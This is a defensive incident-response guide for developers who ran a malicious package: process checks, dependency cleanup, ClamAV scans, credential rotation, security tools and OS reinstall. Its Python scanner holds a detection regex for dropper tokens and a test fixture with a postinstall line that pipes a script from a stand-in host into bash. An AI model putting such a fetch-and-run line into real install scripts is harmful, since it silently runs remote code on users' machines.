
Incident Response

What to do if you ran malicious code

Immediate Actions

1. Disconnect from the Internet

Pull the ethernet cable. Turn off Wi-Fi. Stop the bleeding before cleanup. The reverse shell reconnects every 5 seconds.

2. Check running processes

Run ps aux | grep node on macOS/Linux (the grep command itself will show up in the list; ignore that line) or open Task Manager on Windows. Look for unknown Node.js processes, especially ones with network connections; on macOS/Linux, lsof -i -P -n lists which processes currently hold network sockets.

3. Kill suspicious processes

Kill any unknown node, python, or shell processes. On macOS/Linux: kill -9 <PID>. On Windows: taskkill /F /PID <PID>.

Cleanup Steps

Remove compromised Node.js packages

Delete node_modules and the lockfile, then reinstall from a clean state. Reinstalling resolves the same package.json again, so first remove the malicious package (and whatever pulled it in) from package.json, or the reinstall will fetch it straight back and re-run its install scripts.

rm -rf node_modules package-lock.json && npm install
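Before reinstalling, it helps to know which installed packages declare install-time lifecycle scripts, since npm re-runs those on every install. The following script is an added example, not part of this page or any of the tools it lists: it walks a node_modules tree, reports every package with a preinstall/install/postinstall/prepare script, and flags commands containing tokens chosen here as suspicious (curl, wget, base64, node -e, eval(, bash -c, /dev/tcp). The sample tree in demo() is constructed in a temporary directory.

```python
import json
import os
import re
import tempfile

# npm runs these scripts automatically during install (assumed hook list to review);
# SUSPICIOUS is a constructed set of tokens common in install-time droppers.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SUSPICIOUS = re.compile(r"curl|wget|base64|node -e|eval\(|bash -c|/dev/tcp", re.I)


def find_install_hooks(node_modules):
    """Return sorted [(package, hook, command, suspicious)] for every installed
    package whose package.json declares an install-time lifecycle script."""
    findings = []
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(root, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip rather than abort the scan
        scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
        if not isinstance(scripts, dict):
            continue
        name = manifest.get("name") or os.path.relpath(root, node_modules)
        for hook in INSTALL_HOOKS:
            cmd = scripts.get(hook)
            if isinstance(cmd, str) and cmd:
                findings.append((name, hook, cmd, bool(SUSPICIOUS.search(cmd))))
    return sorted(findings)


def _write_pkg(base, name, scripts):
    d = os.path.join(base, name)
    os.makedirs(d, exist_ok=True)
    with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": name, "version": "1.0.0", "scripts": scripts}, fh)


def demo():
    """Constructed sample tree: a clean package, a legitimate native-build hook,
    and a package whose postinstall fetches a script and pipes it into a shell."""
    base = tempfile.mkdtemp(prefix="node_modules_")
    _write_pkg(base, "clean-lib", {"test": "jest"})
    _write_pkg(base, "native-addon", {"install": "node-gyp rebuild"})
    _write_pkg(base, "evil-helper", {"postinstall": "curl -s http://example.invalid/x | bash"})
    return find_install_hooks(base)
```

Call find_install_hooks("node_modules") on a real project to list its hooks; a flagged entry is a reason to read that package before npm install runs it again, and an unflagged native-build hook like node-gyp rebuild is normal.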

Remove compromised Python packages

Uninstall all pip packages and reinstall from requirements. Run this inside the project's virtual environment; against the system Python it will also remove packages the OS depends on.

pip freeze | xargs pip uninstall -y && pip install -r requirements.txt

Scan with ClamAV

Open-source antivirus that detects known malware signatures. On a fresh Homebrew install, freshclam needs a config file before it will download signatures: copy $(brew --prefix)/etc/clamav/freshclam.conf.sample to freshclam.conf in the same directory and delete the line reading "Example". On Debian/Ubuntu, install with apt install clamav instead of brew.

brew install clamav && freshclam && clamscan -r ~/

Review shell history

Check if the malware executed additional commands via your shell. Two caveats: shell history is usually only written to disk when a shell session exits, and commands the malware spawns directly (child_process, subprocess) never go through your interactive shell, so an empty history is not proof that nothing ran.

cat ~/.bash_history ~/.zsh_history | tail -100

Credential Rotation (Critical)

Assume EVERYTHING was stolen. Rotate all credentials immediately.

All passwords

Every password stored in browsers, password managers, and config files. Assume they were all exfiltrated.

All API keys

AWS, GCP, Azure, Stripe, OpenAI, Vercel, Netlify, Supabase — every service you use.

SSH keys

Generate new SSH keys. Remove old public keys from GitHub, servers, and cloud providers.

Browser stored credentials

Clear all saved passwords in Chrome, Firefox, Brave, Edge. Enable 2FA everywhere.

Crypto wallets

Create a NEW wallet. Transfer all funds immediately. The old wallet seed phrase is compromised.

2FA tokens / TOTP secrets

If TOTP secrets were stored locally, regenerate them. Prefer hardware security keys.

Recommended Security Tools

Codebase Scanner

Scans repos for malware patterns, obfuscation, and suspicious dependencies.

njsscan

Static analysis security tool for Node.js applications.

npm audit / yarn audit

Built-in vulnerability scanning for Node.js dependencies.

eslint-plugin-security

ESLint rules to detect insecure patterns like eval(), Function(), exec().

lockfile-lint

Lint lockfiles to detect malicious packages and registry manipulation.

package-checker

Check npm packages for suspicious patterns before installing.

de4js

JavaScript deobfuscation tool. Useful for analyzing minified/encoded payloads.

Snyk

Commercial vulnerability scanner with free tier. Integrates with CI/CD.

GitGuardian

Scans for leaked secrets in Git history. Free for personal repos.

pip-audit

Audit Python dependencies for known vulnerabilities.

bandit

Security linter for Python code. Detects common security issues.

safety

Check Python dependencies against the Safety vulnerability database.

Nuclear Option

If you suspect deep compromise (persistent backdoor, rootkit, firmware modification), the only safe option is a full OS reformat. Back up important files to an external drive (scan them first, and back up data only: no node_modules, virtual environments, or anything executable), then wipe and reinstall your operating system from scratch.

Reformat → Reinstall OS → Rotate ALL credentials → Restore from clean backup